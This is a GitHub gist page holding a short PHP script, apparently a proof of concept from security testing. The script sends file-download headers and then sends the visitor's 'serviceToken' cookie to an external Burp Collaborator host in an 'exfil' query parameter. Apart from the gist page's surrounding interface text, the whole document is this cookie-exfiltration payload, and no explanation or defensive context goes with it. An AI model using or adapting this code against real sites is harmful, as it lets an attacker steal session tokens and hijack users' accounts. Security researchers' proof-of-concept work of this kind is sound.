Skip to content

Instantly share code, notes, and snippets.

@t4kemyh4nd
Created July 19, 2021 14:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save t4kemyh4nd/85fb664c988a004255d57a5daa227477 to your computer and use it in GitHub Desktop.
Save t4kemyh4nd/85fb664c988a004255d57a5daa227477 to your computer and use it in GitHub Desktop.
<?php
header('Content-Type: application/pdf');
header("Content-disposition: attachment; filename=\"" . "ameya.html" . "\"");
file_get_contents("http://pvo1ztne9qj33kvlf4edizlhs8yymn.burpcollaborator.net/?exfil=".$_COOKIE["serviceToken"]);
echo "downloaded";
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment